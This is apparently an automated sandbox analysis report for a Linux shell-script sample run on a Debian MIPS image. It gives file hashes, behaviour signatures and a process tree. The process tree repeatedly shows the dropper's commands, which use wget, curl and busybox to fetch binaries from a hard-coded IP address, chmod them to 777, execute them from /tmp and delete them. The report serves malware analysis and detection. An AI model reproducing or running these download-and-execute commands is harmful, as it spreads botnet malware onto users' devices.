Analysis
-
max time kernel
67s -
max time network
69s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mips image:debian9-mipsbe-20240611-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mips system -
submitted
28/10/2024, 02:23
Static task
static1
Behavioral task
behavioral1
Sample
39e10ef37dd81e5b6b122495f5d678e5813c416eb7129050525d72cc8dbbd335.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
39e10ef37dd81e5b6b122495f5d678e5813c416eb7129050525d72cc8dbbd335.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
39e10ef37dd81e5b6b122495f5d678e5813c416eb7129050525d72cc8dbbd335.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
39e10ef37dd81e5b6b122495f5d678e5813c416eb7129050525d72cc8dbbd335.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
39e10ef37dd81e5b6b122495f5d678e5813c416eb7129050525d72cc8dbbd335.sh
-
Size
10KB
-
MD5
6c8b51991fdf61d5e4d608d79172aadd
-
SHA1
10016e44064fd77256e054fe97e269bf6b46fc5e
-
SHA256
39e10ef37dd81e5b6b122495f5d678e5813c416eb7129050525d72cc8dbbd335
-
SHA512
3db47a0dc66e9e868e1048b5fe9d76623218d7b22e383a0fe08a6aa839e389312ead6a4f05da171606cfb61b1898bede08be48c1fa45548d78071e0d95d8edb2
-
SSDEEP
192:QFJGhYwT11BGFV2uRjPe7jbP8lglFJGhYw91BGFV+jPe7jvee:4oTuYP8GvNN
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 28 IoCs
-
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/39e10ef37dd81e5b6b122495f5d678e5813c416eb7129050525d72cc8dbbd335.sh/tmp/39e10ef37dd81e5b6b122495f5d678e5813c416eb7129050525d72cc8dbbd335.sh1⤵PID:702
-
/bin/rm/bin/rm bins.sh2⤵PID:705
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵PID:709
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:719
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵PID:730
-
-
/bin/chmodchmod 777 aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵
- File and Directory Permissions Modification
PID:732
-
-
/tmp/aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X./aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵
- Executes dropped EXE
PID:733
-
-
/bin/rmrm aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵PID:734
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵PID:735
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:737
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵PID:738
-
-
/bin/chmodchmod 777 i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵
- File and Directory Permissions Modification
PID:739
-
-
/tmp/i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh./i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵
- Executes dropped EXE
PID:740
-
-
/bin/rmrm i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵PID:741
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵PID:742
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:743
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵PID:744
-
-
/bin/chmodchmod 777 uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵
- File and Directory Permissions Modification
PID:745
-
-
/tmp/uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg./uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵
- Executes dropped EXE
PID:746
-
-
/bin/rmrm uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵PID:747
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵PID:748
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:749
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵PID:756
-
-
/bin/chmodchmod 777 Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵
- File and Directory Permissions Modification
PID:766
-
-
/tmp/Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s./Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵
- Executes dropped EXE
PID:768
-
-
/bin/rmrm Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵PID:770
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵PID:772
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:777
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵PID:784
-
-
/bin/chmodchmod 777 im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵
- File and Directory Permissions Modification
PID:788
-
-
/tmp/im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA./im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵
- Executes dropped EXE
PID:789
-
-
/bin/rmrm im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵PID:792
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵PID:794
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:801
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵PID:807
-
-
/bin/chmodchmod 777 43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵
- File and Directory Permissions Modification
PID:808
-
-
/tmp/43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX./43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵
- Executes dropped EXE
PID:809
-
-
/bin/rmrm 43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵PID:810
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵PID:811
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:812
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵PID:813
-
-
/bin/chmodchmod 777 UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵
- File and Directory Permissions Modification
PID:814
-
-
/tmp/UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva./UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵
- Executes dropped EXE
PID:815
-
-
/bin/rmrm UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵PID:816
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵PID:817
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵
- Reads runtime system information
- Writes file to tmp directory
PID:819
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵PID:827
-
-
/bin/chmodchmod 777 TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵
- File and Directory Permissions Modification
PID:830
-
-
/tmp/TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX8./TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵
- Executes dropped EXE
PID:831
-
-
/bin/rmrm TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵PID:834
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵PID:836
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:842
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵PID:853
-
-
/bin/chmodchmod 777 pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵
- File and Directory Permissions Modification
PID:857
-
-
/tmp/pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv./pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵
- Executes dropped EXE
PID:858
-
-
/bin/rmrm pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵PID:861
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵PID:862
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:863
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵PID:864
-
-
/bin/chmodchmod 777 T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵
- File and Directory Permissions Modification
PID:865
-
-
/tmp/T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox./T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵
- Executes dropped EXE
PID:866
-
-
/bin/rmrm T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵PID:867
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵PID:868
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:869
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵PID:870
-
-
/bin/chmodchmod 777 RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵
- File and Directory Permissions Modification
PID:871
-
-
/tmp/RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl./RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵
- Executes dropped EXE
PID:872
-
-
/bin/rmrm RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵PID:873
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵PID:874
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:875
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵PID:876
-
-
/bin/chmodchmod 777 0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵
- File and Directory Permissions Modification
PID:877
-
-
/tmp/0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ./0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵
- Executes dropped EXE
PID:878
-
-
/bin/rmrm 0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵PID:879
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵PID:880
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:881
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵PID:882
-
-
/bin/chmodchmod 777 UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵
- File and Directory Permissions Modification
PID:883
-
-
/tmp/UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y0./UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵
- Executes dropped EXE
PID:884
-
-
/bin/rmrm UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵PID:885
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵PID:886
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:887
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵PID:888
-
-
/bin/chmodchmod 777 kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵
- File and Directory Permissions Modification
PID:889
-
-
/tmp/kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn./kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵
- Executes dropped EXE
PID:890
-
-
/bin/rmrm kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵PID:891
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵PID:892
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:893
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵PID:894
-
-
/bin/chmodchmod 777 i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵
- File and Directory Permissions Modification
PID:895
-
-
/tmp/i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh./i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵
- Executes dropped EXE
PID:896
-
-
/bin/rmrm i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵PID:897
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵PID:898
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:899
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵PID:900
-
-
/bin/chmodchmod 777 uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵
- File and Directory Permissions Modification
PID:901
-
-
/tmp/uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg./uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵
- Executes dropped EXE
PID:902
-
-
/bin/rmrm uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵PID:903
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵PID:904
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:905
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵PID:906
-
-
/bin/chmodchmod 777 Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵
- File and Directory Permissions Modification
PID:907
-
-
/tmp/Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s./Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵
- Executes dropped EXE
PID:908
-
-
/bin/rmrm Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵PID:909
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵PID:910
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:911
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵PID:912
-
-
/bin/chmodchmod 777 im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵
- File and Directory Permissions Modification
PID:913
-
-
/tmp/im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA./im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵
- Executes dropped EXE
PID:914
-
-
/bin/rmrm im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵PID:915
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵PID:916
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:917
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵PID:918
-
-
/bin/chmodchmod 777 aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵
- File and Directory Permissions Modification
PID:919
-
-
/tmp/aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X./aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵
- Executes dropped EXE
PID:920
-
-
/bin/rmrm aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵PID:921
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵PID:922
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:923
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵PID:924
-
-
/bin/chmodchmod 777 43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵
- File and Directory Permissions Modification
PID:925
-
-
/tmp/43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX./43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵
- Executes dropped EXE
PID:926
-
-
/bin/rmrm 43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵PID:927
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵PID:928
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:929
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵PID:930
-
-
/bin/chmodchmod 777 UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵
- File and Directory Permissions Modification
PID:931
-
-
/tmp/UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva./UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵
- Executes dropped EXE
PID:932
-
-
/bin/rmrm UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵PID:933
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵PID:934
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵
- Reads runtime system information
- Writes file to tmp directory
PID:935
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵PID:936
-
-
/bin/chmodchmod 777 TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵
- File and Directory Permissions Modification
PID:937
-
-
/tmp/TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX8./TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵
- Executes dropped EXE
PID:938
-
-
/bin/rmrm TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵PID:939
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵PID:940
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:941
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵PID:942
-
-
/bin/chmodchmod 777 pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵
- File and Directory Permissions Modification
PID:943
-
-
/tmp/pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv./pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵
- Executes dropped EXE
PID:944
-
-
/bin/rmrm pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵PID:945
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵PID:946
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:947
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵PID:948
-
-
/bin/chmodchmod 777 RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵
- File and Directory Permissions Modification
PID:949
-
-
/tmp/RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl./RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵
- Executes dropped EXE
PID:950
-
-
/bin/rmrm RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵PID:951
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵PID:952
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:953
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵PID:954
-
-
/bin/chmodchmod 777 0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵
- File and Directory Permissions Modification
PID:955
-
-
/tmp/0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ./0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵
- Executes dropped EXE
PID:956
-
-
/bin/rmrm 0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵PID:957
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵PID:958
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:959
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵PID:960
-
-
/bin/chmodchmod 777 UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵
- File and Directory Permissions Modification
PID:961
-
-
/tmp/UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y0./UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵
- Executes dropped EXE
PID:962
-
-
/bin/rmrm UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵PID:963
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵PID:964
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:965
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵PID:966
-
-
/bin/chmodchmod 777 kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵
- File and Directory Permissions Modification
PID:967
-
-
/tmp/kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn./kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵
- Executes dropped EXE
PID:968
-
-
/bin/rmrm kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵PID:969
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵PID:970
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:971
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵PID:972
-
-
/bin/chmodchmod 777 T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵
- File and Directory Permissions Modification
PID:973
-
-
/tmp/T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox./T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵
- Executes dropped EXE
PID:974
-
-
/bin/rmrm T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵PID:975
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97